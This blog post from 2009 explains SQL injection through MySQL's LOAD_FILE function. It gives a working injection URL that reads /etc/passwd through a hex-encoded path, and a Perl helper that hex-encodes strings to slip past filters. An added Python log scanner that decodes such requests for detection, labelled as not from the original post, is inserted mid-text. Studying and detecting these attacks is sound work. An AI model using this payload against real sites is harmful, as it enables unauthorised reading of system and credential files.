MYSQL LOAD_FILE SQL Injection

Written by Tully on July 30, 2009. Categories: MySQL

So today I was reading up on some SQL injection techniques and came across one that I had not seen before. It is possible to use a UNION SELECT with the built-in MySQL LOAD_FILE function to read the contents of any file on the system. This only works if the database user has been granted permission to use the LOAD_FILE function, and of course the MySQL daemon must have permission to read the file. I also found out that the LOAD_FILE function accepts its argument as a hexadecimal-encoded string.

Example Injection: www.example.com/article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764)

This will return the contents of /etc/passwd on a Linux machine.
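Because the path travels as a hex literal, searching web logs for the string /etc/passwd misses this request. The following is an added example, not code from the original post: a log scanner that decodes the argument of LOAD_FILE() so the requested file becomes visible. The log lines, log format and function names are constructed for illustration, and the quoted-string case goes slightly beyond the hex case shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jul/2009:10:01:02 +0000] "GET /article.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Jul/2009:10:01:09 +0000] "GET /article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764) HTTP/1.1" 200 1843',
    '203.0.113.7 - - [30/Jul/2009:10:01:15 +0000] "GET /article.php?id=1%20UNION%20SELECT%20load_file%280x2f6574632f706173737764%29 HTTP/1.1" 200 1843',
    '203.0.113.7 - - [30/Jul/2009:10:01:21 +0000] "GET /article.php?id=1+union+select+load_file(%27/etc/passwd%27) HTTP/1.1" 200 1843',
]

# LOAD_FILE( followed by a 0x hex literal or a quoted string, any letter case.
LOAD_FILE_RE = re.compile(
    r"load_file\s*\(\s*(?:0x([0-9a-f]+)|['\"]([^'\"]*)['\"])",
    re.IGNORECASE,
)

def decode_hex_literal(hexdigits):
    """Decode the digits of a MySQL 0x literal to text."""
    if len(hexdigits) % 2:
        # MySQL treats an odd-length 0x literal as having a leading zero.
        hexdigits = "0" + hexdigits
    return bytes.fromhex(hexdigits).decode("utf-8", errors="replace")

def find_load_file(request_line):
    """Return the decoded file paths passed to LOAD_FILE() in one log line."""
    # URL-decode first: '+' and %20 become spaces, %28/%29 become parentheses.
    text = unquote_plus(request_line)
    return [decode_hex_literal(h) if h else q
            for h, q in LOAD_FILE_RE.findall(text)]

def scan(lines):
    """Return (line_number, decoded_path) for every LOAD_FILE() call found."""
    hits = []
    for number, line in enumerate(lines, 1):
        hits.extend((number, path) for path in find_load_file(line))
    return hits

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: LOAD_FILE argument decodes to {path!r}")
```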

I also came across a handy Perl script today that will encode a given string into hex.

Perl hex converter:

Note: There is an underscore between LOAD and FILE.


#!/usr/bin/perl
use strict;
use warnings;

print "Enter string to encode: ";
my $str = <STDIN>;
chomp $str;

my $enc = encode($str);
print "Hex Encoded value: 0x$enc\n";

# Encode each byte of the string as two lowercase hex digits.
sub encode {
    my ($sqlstr) = @_;
    my $encoded = '';
    foreach my $byte (unpack("C*", $sqlstr)) {
        # %02x zero-pads bytes below 0x10 so every byte is two digits
        $encoded .= sprintf('%02x', $byte);
    }
    return $encoded;
}
